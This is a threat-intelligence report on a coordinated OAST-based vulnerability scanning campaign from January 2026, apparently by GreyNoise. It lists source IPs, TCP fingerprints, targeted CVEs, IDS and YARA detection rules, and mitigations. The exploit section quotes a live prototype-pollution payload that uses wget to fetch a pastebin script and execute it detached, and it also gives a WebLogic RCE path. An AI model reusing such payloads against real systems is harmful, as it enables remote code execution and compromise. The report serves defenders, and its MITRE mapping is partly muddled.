Full Report
Overview Between January 24 and January 31, 2026, the GreyNoise Global Observaton Grid cataloged 6,752 scanning sessions from 58 unique IP addresses embedding 5,531 distinct Out-of-band Application Security Testing (OAST) callback domains across 48 identified campaigns. The activity represents coordinated vulnerability reconnaissance targeting enterprise applications, IoT devices, and cloud infrastructure. Key Indicators: - 5,531 OAST domains decoded from 28 unique machine identifiers - Anomalous TCP fingerprints (MSS 65495) observed in 11.8% of traffic - Multiple high-severity CVE exploits including WebLogic RCE, Java deserialization, and React prototype pollution - Sustained campaign activity spanning 3.6 weeks (earliest OAST timestamp: 2026-01-05) v ## Infrastructure Analysis Network Distribution ASN Organization Countries Session Count % of Total AS14956 RouterHosting LLC Germany 2,344 34.7% AS24806 INTERNET CZ, a.s. Czech Republic 1,824 27.0% AS31898 Oracle Corporation Canada, South Korea 1,400 20.7% AS14061 DigitalOcean Singapore 326 4.8% AS210538 KEYUBU Internet Turkey 656 9.7% Other Various 22 countries 202 3.0% JA4 Fingerprint Analysis Three primary fingerprint families identified: 1. Standard Linux Scanner (79.5% of traffic) JA4T: 64240_2-4-8-1-3_1460_7 Window Size: 64240 MSS: 1460 (standard) Sessions: 5,372 Assessment: Consistent with modified Linux scanning tools or frameworks 2. Anomalous Scanner Type A (8.2% of traffic) JA4T: 33280_2-4-8-1-3_65495_7 Window Size: 33280 MSS: 65495 (ANOMALOUS) Sessions: 556 Assessment: Custom network stack - MSS value 65495 not found in legitimate software 3. Anomalous Scanner Type B (3.6% of traffic) JA4T: 65495_2-4-8-1-3_65495_7 Window Size: 65495 MSS: 65495 (ANOMALOUS) Sessions: 245 Assessment: Highly distinctive custom stack configuration Significance: MSS value 65495 is a strong fingerprint for purpose-built scanning infrastructure. This value approaches the theoretical TCP MSS maximum (65535) and is never used by standard operating systems or network stacks. Top Source IPs IP Address Country ASN Sessions First Seen Last Seen 172.86.66.237 Germany AS14956 2,344 2026-01-27 2026-01-31 194.182.90.104 Czech Republic AS24806 1,824 2026-01-25 2026-01-31 40.233.66.153 Canada AS31898 789 2026-01-27 2026-01-29 168.107.59.85 South Korea AS31898 611 2026-01-24 2026-01-30 31.57.77.235 Turkey AS210538 575 2026-01-28 2026-01-30 OAST Campaign Analysis Decoded 5,531 OAST domains revealing 48 distinct campaigns across 28 unique machine IDs. Top 5 Campaigns by Volume Campaign: dftn9 OAST Domains: 2,044 (36.9%) Machine ID: af:ed:d2 PIDs: 45287, 6518 Duration: January 27-29, 2026 (1.7 days) K-Sort Values: d5sf0j, d5tidb Assessment: Largest campaign by domain count - intensive burst scanning Campaign: vn6u3 OAST Domains: 892 (16.1%) Machine ID: f7:37:86 PIDs: 54381, 42767, 35027, 42599 Duration: January 27-30, 2026 (3.3 days) K-Sort Values: d5seuo, d5t1qc, d5ug5j, d5ul4a Assessment: Sustained scanning with multiple process restarts Campaign: gffll OAST Domains: 465 (8.4%) Machine ID: 0f:7d:6a PIDs: 34674, 57772 Duration: January 27-29, 2026 (1.5 days) Assessment: Coordinated with dftn9 campaign - similar temporal window Campaign: 49ndh OAST Domains: 293 (5.3%) Machine ID: 89:bb:62 PIDs: 53182, 55486 Duration: January 25-30, 2026 (5.0 days) Assessment: Longest-running campaign with steady activity Campaign: s9ndh OAST Domains: 8 (0.1%) Machine ID: 89:bb:62 First Seen: January 24, 2026 Assessment: Early reconnaissance phase from same machine as 49ndh campaign OAST Infrastructure: Domains primarily used .oast.fun, .oast.live, .oast.me, .oast.pro, and .oast.site TLDs - all associated with the Interactsh OAST service. Exploit Analysis CVEs Actively Exploited CVE-2020-14882 / CVE-2020-14883 (Oracle WebLogic RCE) Occurrences: 23+ payloads Path: /_nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession Payload Type: Java deserialization leading to RCE Severity: Critical (CVSS 9.8) React Prototype Pollution with Malware Loader Occurrences: 17+ variants Malware Staging: https://pastebin.com/raw/9GEqrAq5 Execution Methods: setsid, nohup, dos2unix - designed for persistence Payload Pattern: process.mainModule.require('child_process').execSync( 'cd /tmp;wget -O run.sh https://pastebin.com/raw/9GEqrAq5; chmod +x run.sh;setsid sh run.sh /dev/null > /dev/null 2>&1 &' ) Java Deserialization Attacks Frameworks Targeted: Apache Commons (PriorityQueue deserialization) JNDI injection via JdbcRowSetImpl Apache Spark RCE (CVE-2018-11770) Occurrences: Multiple variants across 6+ payload families XML External Entity (XXE) Injection Occurrences: 8+ payloads Technique: Target: XML parsers in enterprise applications IoT/Network Device Command Injection Targets: TP-Link, D-Link, GPON ONT devices Commands: wget, curl, nslookup with OAST callbacks Assessment: Opportunistic targeting of known IoT vulnerabilities Targeted Applications/Services Oracle WebLogic Server WordPress (multiple plugins) Grafana pfBlockerNg Apache Spark Seeyon OA Various GPON/ONT firmware ColdFusion (Adobe) Temporal Analysis Session Volume by Day Date Sessions Unique IPs Peak Hour Burst Detected 2026-01-24 73 8 12:00 UTC No 2026-01-25 361 9 19:00 UTC Yes (282 sessions) 2026-01-26 459 18 04:00 UTC Yes (273 sessions) 2026-01-27 1,629 19 17:00 UTC Yes (492 sessions) 2026-01-28 1,240 11 05:00 UTC Yes (372 sessions) 2026-01-29 840 7 13:00 UTC Yes (210 sessions) 2026-01-30 1,552 21 19:00 UTC Yes (406 sessions) 2026-01-31 598 5 00:00 UTC Yes (377 sessions) Burst Pattern Analysis 39 hourly bursts detected (>100% increase over previous hour): - Peak burst: 2026-01-30 19:00 UTC - 406 sessions (from 2 previous hour) - Consistent evening UTC bursts (17:00-21:00) - Suggests automated scanning orchestration with scheduled execution Historical Context & Campaign Lifecycle Pre-Dating Evidence OAST timestamp analysis reveals activity pre-dating sensor observation window: Earliest OAST domain: January 5, 2026 (Campaign: 972vm) Earliest sensor session: January 24, 2026 Gap: 19 days of prior activity Assessment: The scanning infrastructure was operational for nearly 3 weeks before hitting GreyNoise sensors. This suggests: 1. Established infrastructure - not a new/test campaign 2. Broader target scope - GreyNoise sensors represent subset of total targets 3. Ongoing operations - campaigns likely continuing beyond observation window Campaign Coordination Indicators Evidence of coordinated operations: 1. Shared OAST infrastructure - all campaigns use same Interactsh service 2. Overlapping temporal windows - major campaigns (dftn9, vn6u3, gffll) active Jan 27-29 3. Common exploit payloads - same CVEs targeted across multiple source IPs 4. Fingerprint diversity - deliberate use of multiple TCP stack configurations Attribution & Threat Actor Assessment Confidence: Medium Indicators: - Professional OAST usage - 48 campaigns with unique machine IDs suggests organized tooling - Exploit diversity - targets enterprise (WebLogic, Spark) and IoT infrastructure - Custom fingerprints - MSS 65495 indicates purpose-built scanning tools - No attribution artifacts - no clear C2 domains, staging servers use Pastebin Likely Actor Profile Opportunistic vulnerability research collective or bug bounty operation: - Not APT/nation-state - too noisy, lacks operational security - Possibly legitimate - OAST usage consistent with security research - Commercial tooling - fingerprint diversity suggests framework usage (Nuclei, custom scanners) Alternative assessment: Reconnaissance for follow-on exploitation by multiple threat actors sharing infrastructure. Recommendations Immediate Actions Block source IPs - All 58 IPs confirmed as scanning infrastructure Monitor OAST callbacks - Alert on connections to .oast.* domains Patch CVEs - Prioritize: CVE-2020-14882/14883 (WebLogic) Java deserialization vectors IoT device firmware updates Detection Engineering Network Signatures: # Anomalous MSS detection alert tcp any any -> any any (msg:"Anomalous MSS 65495 - Custom Scanner"; \ tcp.mss: 65495; sid:1000001;) # OAST domain pattern alert dns any any -> any 53 (msg:"Interactsh OAST Callback"; \ dns.query; content:".oast."; sid:1000002;) YARA for malware staging URL: rule Pastebin_9GEqrAq5_Malware_Loader { strings: $url = "pastebin.com/raw/9GEqrAq5" $wget = "wget -O run.sh" condition: any of them } Long-term Monitoring Track machine ID evolution - Monitor for reuse of MAC prefixes (af:ed:d2, f7:37:86, 0f:7d:6a, 89:bb:62) JA4 fingerprint database - Add MSS 65495 patterns to threat intel feeds OAST domain correlation - Cross-reference k-sort values across future incidents Conclusion This analysis documents a multi-week reconnaissance campaign leveraging sophisticated OAST techniques across 48 distinct sub-campaigns. While the activity is noisy and detectable, the scale (5,531 callback domains), infrastructure diversity (28 machines), and exploit breadth indicate an organized operation. The use of anomalous TCP fingerprints (MSS 65495) provides a high-confidence detection opportunity for defensive teams. Organizations should prioritize patching the identified CVEs and implementing OAST callback monitoring.
Analysis Summary
# Attack Campaign: Coordinated OAST Vulnerability Reconnaissance
## Overview
A large-scale, coordinated vulnerability reconnaissance campaign spanning multiple weeks, detected between January 24 and January 31, 2026. The activity utilized Out-of-band Application Security Testing (OAST) methodologies via Interactsh to confirm exploitable vulnerabilities across enterprise applications, IoT devices, and cloud infrastructure. The operation featured 48 distinct sub-campaigns driven by numerous unique machine identifiers and leveraging custom network fingerprinting.
## Technical Details
- Type: Technique / Coordinated Reconnaissance
- Platform: Enterprise Applications (Java/WebLogic, Apache Spark), Web Frameworks (React), IoT Devices (TP-Link, D-Link, GPON ONT)
- Capabilities: Automated vulnerability scanning and verification using OAST callbacks.
- First Seen: Earliest OAST timestamp identified was 2026-01-05.
## MITRE ATT&CK Mapping
- TA0043 - C2 (Command and Control) - *Used in a passive sense, leveraging external service for callback validation.*
- T1568 - Dynamic Resolution
- T1568.002 - Domain Generation Algorithms (*Though DGA is not explicitly used, the high volume of generated subdomains acts similarly for validation timing.*)
- TA0008 - Lateral Movement (*Exploits leveraged aim for initial access leading to control.*)
- T1189 - Drive-by Compromise (*Applicable if OAST technique is used as a passive prerequisite for exploitation.*)
- TA0001 - Initial Access
- T1190 - Exploit Public-Facing Application
## Functionality
### Core Capabilities
- **OAST Probing:** Utilizing 5,531 distinct domains associated with the Interactsh service (`.oast.fun`, `.oast.live`, etc.) to confirm system reachability and vulnerability execution.
- **Campaign Management:** Organized into 48 sub-campaigns, tracked by 28 unique machine identifiers and associated K-Sort values (e.g., `d5sf0j`, `d5seuo`).
- **Exploit Focus:** Active testing against known high-severity CVEs.
### Advanced Features
- **Custom Network Fingerprinting:** A significant portion of traffic (11.8%) exhibited anomalous TCP fingerprints, specifically setting the Maximum Segment Size (MSS) to 65495. This indicates the use of **purpose-built scanning infrastructure** or modified tools not adhering to standard operational system stacks.
- **Persistence/Staging Indicators:** Payloads exploiting React Prototype Pollution included elements designed explicitly for persistence, such as utilizing `/tmp` execution paths with commands like `setsid`, `nohup`, and `dos2unix`.
- **Infrastructure Sharing:** Evidence suggests coordination, with multiple campaigns overlapping in time (e.g., `dftn9` and `gffll`) and sharing infrastructure components (Machine ID `89:bb:62` ran both `49ndh` and `s9ndh`).
## Indicators of Compromise
- File Hashes: N/A (Focus was on reconnaissance payloads, not final malware drops, though a specific staging URL was noted.)
- File Names: `run.sh` (Staging execution script)
- Registry Keys: N/A
- Network Indicators:
- OAST Domains: Domains ending in `.oast.fun`, `.oast.live`, `.oast.me`, `.oast.pro`, `.oast.site` (all linked to Interactsh).
- Malware Staging URL: `pastebin[.]com/raw/9GEqrAq5` (Defanged)
- Behavioral Indicators:
- TCP connections initiating with anomalous MSS value of **65495**.
- Detection of execution chains involving `setsid`, `nohup`, and `wget` targeting the Pastebin URL.
- Specific URIs targeting WebLogic RCE: `/_nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession`
## Associated Threat Actors
The profile suggests:
1. **Opportunistic Vulnerability Research Collective/Bug Bounty Operation:** Indicated by the noisy, large-scale OAST usage, which is common in security research but lacks APT operational security.
2. **Multiple Threat Actors Sharing Infrastructure:** The diversity of exploits and fingerprints could mean several actors are leveraging shared or commercial scanning infrastructure for initial reconnaissance.
The activity is explicitly assessed as **Not APT/nation-state**.
## Detection Methods
- **Network Signatures (IDS/IPS):** Alerting on traffic where `tcp.mss` equals **65495** (JA4 Hash signatures 33280_2-4-8-1-3_65495_7 and 65495_2-4-8-1-3_65495_7). Alerting on DNS queries containing `.oast.` content.
- **YARA Rule (For confirmed payloads):**
yara
rule Pastebin_9GEqrAq5_Malware_Loader {
strings:
$url = "pastebin.com/raw/9GEqrAq5"
$wget = "wget -O run.sh"
condition:
any of them
}
- **Log Analysis:** Monitoring for connection attempts to known Oracle WebLogic/Apache Spark exploitation paths.
## Mitigation Strategies
1. **Patching:** Immediately prioritize patching CVE-2020-14882/14883 (Oracle WebLogic RCE) and applying firmware updates for targeted IoT devices (TP-Link, D-Link, GPON ONT).
2. **Application Hardening:** Review and secure endpoints vulnerable to Java deserialization and React Prototype Pollution.
3. **Network Blocking:** Block the identified 58 source IP addresses and restrict outbound DNS/HTTP access to known OAST domains if justified by policy.
## Related Tools/Techniques
- **Interactsh:** The OAST framework used for callback validation.
- **Custom Scanning Frameworks:** Implied by the custom TCP MSS 65495 fingerprint; potentially modified versions of open-source scanners like Nuclei.
- **Exploitation Techniques:** Java deserialization (e.g., MVEL injection), JNDI injection, and XXE injection are fundamental exploitation methods observed.
- **Malware Staging Techniques:** Use of standard shell commands (`setsid`, `nohup`, `wget`) for lightweight payload execution and persistence attempts.